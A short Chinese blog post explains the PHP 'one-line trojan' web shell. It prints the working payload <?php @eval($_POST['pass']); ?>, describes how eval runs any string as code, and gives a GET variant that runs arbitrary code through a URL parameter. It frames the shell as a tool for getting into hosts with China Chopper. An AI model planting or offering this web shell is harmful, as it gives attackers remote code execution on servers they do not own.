什么是一句话木马展开目录
一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用。我们可以利用一句话木马来对主机进行渗透操作,最常见的工具就是号称黑客之刃的中国菜刀。这里我们主要讲解 php 一句话木马,因为别的语言我也不会啊。
一句话木马示例展
<?php @eval($_POST['pass']); ?>
//pass密码
一句话木马原理
在这里我们可以看到他的核心参数就是 eval 函数,这个 eval 函数是干嘛的呢,我们通过 php 官网的文档可以得到以下信息。
//(PHP 4, PHP 5, PHP 7)
eval ( string $code ) : mixed //把字符串作为PHP代码执行
显然,原理已经很明了了,把字符串当做 php 代码来执行,再看一句话木马中 eval 函数传入的字符串是什么,他没有传入字符串,它传入的是一个自定义变量,$_POST,其实这里不止可以传入 $_POST,任何字符串都是可以传入的。
比如说我们传入 $_GET [‘a’] 变量,这个文件名咱们假设是 test.php,那么我们只要访问 test.php?a = 要执行的代码就可以来执行任何代码了。
© 版权声明
THE END
- 最新
- 最热
只看作者